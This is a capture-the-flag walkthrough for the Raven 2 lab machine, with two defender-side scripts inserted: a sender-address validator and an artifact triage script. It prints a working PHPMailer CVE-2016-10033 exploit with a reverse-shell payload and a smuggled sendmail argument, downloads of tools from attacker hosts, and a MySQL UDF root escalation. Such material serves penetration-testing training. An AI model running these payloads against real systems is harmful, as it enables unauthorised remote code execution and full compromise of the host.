Raven: 2 target machine compromise

0x00 Preface

Raven 2 is a medium-difficulty boot2root virtual machine with four flags to find. After being compromised several times, Raven Security has taken additional measures to harden its web server against intrusion.

Target machine download: https://download.vulnhub.com/raven/Raven2.ova

0x01 Host discovery

1. On Windows, a port scanning tool run against the whole target subnet (192.168.1.0/24) finds that 192.168.1.12 is the target machine, with ports 80, 22 and 111 open.

2. On Linux, host discovery can be done with the arp-scan or netdiscover commands; 192.168.1.101 is identified as the target machine.

root@backlion# arp-scan -l

or

root@backlion# netdiscover -r 192.168.1.0/24


0x02 Port scanning

1. Port-scan the target host with nmap:

nmap -A 192.168.1.12

2. Ports 22, 80 and 111 are found open. Port 80 runs a web application, so the system can be entered by compromising the web app. Brute-forcing port 22 is not recommended because the target's system password is too strong.

 

0x02 Directory enumeration

1. On Linux, dirb can be used for directory scanning.

2. On Windows, dirbuster can also be used for directory scanning; it shows the directory structure more intuitively.

3. Several top-level directories are found. Examining the file contents one by one, two interesting things turn up under /vendor/: http://192.168.1.32/vendor/PATH shows flag1 and the absolute path of the web root.

4. Visiting http://192.168.1.12/vendor/VERSION reveals the version number of some software, but not which software it belongs to.

The same directory also contains a file named PHPMailerAutoload.php; taken together, this indicates that PHPMailer version 5.2.16 is in use.

 

0x03 Reverse shell

1. On Kali, searchsploit can be used directly to search for exploits for the PHPMailer vulnerability:

root@kali2018:~# searchsploit phpmailer
------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title | Path
                                                                                                                         | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
PHPMailer 1.7 - 'Data()' Remote Denial of Service | exploits/php/dos/25752.txt
PHPMailer < 5.2.18 - Remote Code Execution (Bash) | exploits/php/webapps/40968.php
PHPMailer < 5.2.18 - Remote Code Execution (PHP) | exploits/php/webapps/40970.php
PHPMailer < 5.2.18 - Remote Code Execution (Python) | exploits/php/webapps/40974.py
PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit) | exploits/multiple/webapps/41688.rb
PHPMailer < 5.2.20 - Remote Code Execution | exploits/php/webapps/40969.pl
PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnScriptum' Remote Code Exe | exploits/php/webapps/40986.py
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution | exploits/php/webapps/42221.py
PHPMailer < 5.2.21 - Local File Disclosure | exploits/php/webapps/43056.py
WordPress PHPMailer 4.6 - Host Header Command Injection (Metasploit) | exploits/php/remote/42024.rb
------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

cp /usr/share/exploitdb/exploits/php/webapps/40974.py /opt
cd /opt

2. You can also search exploit-db.com, where the exploit is found at:

https://www.exploit-db.com/exploits/40974

Make a few simple modifications to the exploit:

    a. Add a # -*- coding: utf-8 -*- declaration at the top; otherwise the many non-ASCII characters in the comments cause an error.

    b. Change target to the target machine's IP address; the file to exploit is contact.php.

    c. Change the backdoor file name. For some reason the default backdoor.php never worked for me; after changing the payload to shell.php it finally succeeded.

    d. Change the reverse shell address to the IP of the nc listener (the Kali host) and its port.

    e. Running this Python script requires the corresponding package (pip install requests-toolbelt); download it from the following address and install it manually:

https://files.pythonhosted.org/packages/86/f9/e80fa23edca6c554f1994040064760c12b51daff54b55f9e379e899cd3d4/requests-toolbelt-0.8.0.tar.gz

3. The final modified POC:

# -*- coding: utf-8 -*-
from requests_toolbelt import MultipartEncoder
import requests
import os
import base64

os.system('clear')
print("\n")
print(" █████╗ ███╗   ██╗ █████╗ ██████╗  ██████╗ ██████╗ ██████╗ ███████╗██████╗ ")
print("██╔══██╗████╗██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗")
print("███████║██╔██╗ ██║███████║██████╔╝██║     ██║   ██║██║  ██║█████╗  ██████╔╝")
print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║     ██║   ██║██║  ██║██╔══╝  ██╔══██╗")
print("██║██║██║ ╚████║██║  ██║██║  ██║╚██████╗╚██████╔╝██████╔╝███████╗██║  ██║")
print("╚═╝╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝╚═╝")
print("      PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")

# Contact form on the target that hands the sender address to sendmail
target = 'http://192.168.1.12/contact.php'
# Name of the file written into the web root by sendmail's -X log option
backdoor = '/backlion.php'
# PHP body of the dropped file: a Python reverse shell back to the listener
payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.1.11\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'

fields = {'action': 'submit',
          'name': payload,
          # The email field smuggles extra sendmail options into the -f argument
          'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/var/www/html/backlion.php server\" @protonmail.com',
          'message': 'Pwned'}

m = MultipartEncoder(fields=fields,
                     boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')
headers = {'User-Agent': 'curl/7.47.0',
           'Content-Type': m.content_type}

print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
r = requests.post(target, data=m.to_string(), headers=headers)
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
r = requests.get(target + backdoor, headers=headers)
if r.status_code == 200:
    print('[+]ExPLoITeD ' + target)

 

Then run the exploit; you can see that it produces the exploit file contact.php.

6. Visit contact.php (http://192.168.1.12/contact.php); at this point the backdoor file shell.php is generated.

7. Then visit the backdoor file: http://192.168.1.12/shell.php

8. Start the nc listener on the attack server and receive the reverse shell.

9. Go to the configuration file in the wordpress directory and look at its database connection settings:
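As an added defender-side example (not part of the original walkthrough or the exploit author's code), the check below rejects sender addresses shaped like the one in the exploit's email field and shows why passing the address as a single quoted argument keeps sendmail from seeing extra options; the form submissions are constructed, and the strict sender grammar is an assumption rather than PHPMailer's own fix.

```python
"""Input check and log triage for the PHPMailer sendmail argument-injection
pattern (CVE-2016-10033) used against contact.php in the walkthrough above."""
import re
import shlex

# Strict sender grammar: dot-atom local part only. Quoted local parts ("a b"@x)
# are RFC-valid but are exactly what lets an address carry extra sendmail flags.
SAFE_SENDER = re.compile(
    r"^[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]+(\.[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]+)*"
    r"@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}$")
# Tokens that only make sense as sendmail options, never inside a mailbox name
# (-X log file, -O/-oQ queue directory, -C config file).
SENDMAIL_FLAG = re.compile(r"(?:^|\s)-(?:X\S*|O\w+=\S*|oQ\S*|C\S*)")

def is_safe_sender(address: str) -> bool:
    """True only for addresses that cannot be split or misread by sendmail."""
    return SAFE_SENDER.match(address) is not None

def injection_indicators(address: str) -> list:
    """Explain why an address is rejected; an empty list means nothing suspicious."""
    hits = []
    if any(c.isspace() for c in address):
        hits.append("whitespace")
    if any(c in address for c in '"\'\\'):
        hits.append("quote or backslash")
    for m in SENDMAIL_FLAG.finditer(address):
        hits.append("sendmail option " + m.group(0).strip())
    return hits

def sendmail_argv(address: str) -> list:
    """Argv the MTA would see when the address is passed as ONE quoted argument
    (shlex.quote is the Python analogue of PHP's escapeshellarg)."""
    return shlex.split("/usr/sbin/sendmail -t -i -f" + shlex.quote(address))

# Constructed contact-form submissions: a normal one and the exploit's sender.
SUBMISSIONS = [
    {"name": "Alice", "email": "alice@example.com"},
    {"name": "<?php ... ?>",
     "email": '"anarcoder\\" -OQueueDirectory=/tmp -X/var/www/html/backlion.php server" @protonmail.com'},
]

def triage(submissions) -> list:
    """(address, indicators) for every submission the strict grammar rejects."""
    return [(s["email"], injection_indicators(s["email"]))
            for s in submissions if not is_safe_sender(s["email"])]

if __name__ == "__main__":
    for addr, why in triage(SUBMISSIONS):
        print("REJECT", addr, why)
        print("  argv with quoting:", sendmail_argv(addr))
```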

cd /var/www/html/wordpress

cat wp-config.php

 

10. Check which user MySQL runs as (it runs as root, and the output also shows the mysql plugin directory):

 ps -ef|grep mysql

11. Open the mysql console; from here you can check the database version and the plugin directory:

 www-data@Raven:/var/www/html/wordpress$ mysql -u root -pR@v3nSecurity

12. The nc shell does not support interactive su, so first use python to upgrade to a pseudo-terminal:

python -c "import pty;pty.spawn('/bin/bash')"

Going to the website directory, flag2.txt is found:
cd /var/www

cat flag2.txt

13. Next, search the whole filesystem for flags:

www-data@Raven:/var/www/html$ find / -name "flag*"

flag3 is found; it is an image, so access it directly:
http://192.168.1.13/wordpress/wp-content/uploads/2018/11/flag3.png

 

14. Then switch to /tmp and download the LinEnum.sh script, which enumerates many basic and advanced Linux system details:

cd /tmp

wget http://192.168.1.109/LinEnum.sh

chmod 777 LinEnum.sh

./LinEnum.sh

We find the MySQL-Exploit-Remote-Root-Code-Execution-Privesc vulnerability! (More information: https://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html)

15. Next comes the privilege escalation exploit https://www.exploit-db.com/exploits/1518. Compile it on the Kali attack machine to produce the .so file:

root@kali2018:~# wget http://192.168.1.5/raptor_udf.c          # the Kali system must be 64-bit, otherwise this errors out

root@kali2018:~# gcc -g -c raptor_udf.c

root@kali2018:~# gcc -g -shared -o  raptor_udf.so raptor_udf.o -lc

16. Download the privilege escalation exploit file raptor_udf2.so from the attack machine:

www-data@Raven:/var/www/html/wordpress$ cd /tmp

www-data@Raven:/tmp$ wget http://192.168.1.11:8080/raptor_udf2.so

Then escalate privileges through a MySQL UDF (run the SQL statements below; the dumpfile path must be adjusted to the plugin directory shown in the process listing earlier, plugin-dir=/usr/lib/mysql/plugin):

mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.08 sec)

mysql> insert into foo values(load_file('/tmp/raptor_udf.so'));
Query OK, 1 row affected (0.01 sec)

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf.so';
Query OK, 1 row affected (0.11 sec)

mysql> create function do_system returns integer soname 'raptor_udf.so';
Query OK, 0 rows affected (0.00 sec)

mysql> select * from mysql.func;
+-----------+-----+---------------+----------+
| name      | ret | dl            | type     |
+-----------+-----+---------------+----------+
| do_system |   2 | raptor_udf.so | function |
+-----------+-----+---------------+----------+
1 row in set (0.00 sec)

mysql> select do_system('chmod u+s /usr/bin/find');
+--------------------------------------+
| do_system('chmod u+s /usr/bin/find') |
+--------------------------------------+
|                                    0 |
+--------------------------------------+
1 row in set (0.01 sec)

mysql> exit
Bye
www-data@Raven:/tmp$ touch finn
www-data@Raven:/tmp$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Raven:/tmp$ find finn -exec "/bin/sh" \;
# whoami
root
#
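As an added detection example for the escalation chain above (not part of the original walkthrough), the script below triages the three artifacts the chain leaves behind: mysqld running as root, an unbaselined UDF in mysql.func, and a SUID bit on a binary that is not normally SUID. The process listing, func rows and SUID listing are constructed to mirror the walkthrough's output, and both baselines are assumptions to be replaced with a known-good inventory.

```python
"""Post-exploitation triage for the MySQL UDF privilege-escalation chain."""

# Constructed: lines in the shape of `ps -eo user,pid,args` output.
PS_OUTPUT = """root       548 /usr/sbin/mysqld --plugin-dir=/usr/lib/mysql/plugin --user=root
www-data  1201 /usr/sbin/apache2 -k start"""

# Constructed: rows in the shape of `select name,ret,dl,type from mysql.func`.
MYSQL_FUNC_ROWS = [("do_system", 2, "raptor_udf.so", "function")]

# Constructed: `find / -perm -4000 -type f` style listing.
SUID_LISTING = """/usr/bin/passwd
/usr/bin/sudo
/usr/bin/find
/bin/ping"""

# Assumed baselines; on a real host take these from a clean image or package manifests.
EXPECTED_SUID = {"/usr/bin/passwd", "/usr/bin/sudo", "/bin/ping", "/bin/su", "/usr/bin/newgrp"}
EXPECTED_UDF_LIBS = set()  # a stock install registers no UDF libraries

def mysqld_runs_as_root(ps_text: str) -> bool:
    """True if any mysqld process runs as root or was started with --user=root."""
    for line in ps_text.splitlines():
        user, _pid, args = line.split(None, 2)
        if "mysqld" in args and (user == "root" or "--user=root" in args):
            return True
    return False

def rogue_udfs(rows, baseline=EXPECTED_UDF_LIBS) -> list:
    """Names of UDFs whose shared library is not in the baseline."""
    return [name for name, _ret, dl, _type in rows if dl not in baseline]

def unexpected_suid(listing: str, baseline=EXPECTED_SUID) -> list:
    """SUID binaries absent from the baseline (e.g. find after `chmod u+s`)."""
    return sorted(set(listing.split()) - baseline)

def triage() -> list:
    """Human-readable findings for the constructed evidence above."""
    findings = []
    if mysqld_runs_as_root(PS_OUTPUT):
        findings.append("mysqld runs as root: any registered UDF executes with uid 0")
    for fn in rogue_udfs(MYSQL_FUNC_ROWS):
        findings.append(f"unbaselined UDF registered in mysql.func: {fn}")
    for path in unexpected_suid(SUID_LISTING):
        findings.append(f"unexpected SUID binary: {path}")
    return findings

if __name__ == "__main__":
    for f in triage():
        print("[!]", f)
```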

 

17. Finally, go to the root directory and read flag4.txt:

# cd /root
# ls
# cat flag4.txt
  ___ ___ ___
 | _ \__ ___ _____ _ _ |_ _|_ _|
 | / _` \ V / -_) ' \ | | | |
 |_|_\__,_|\_/\___|_||_|___|___|
flag4{df2bc5e951d91581467bb9a2a8ff4425}
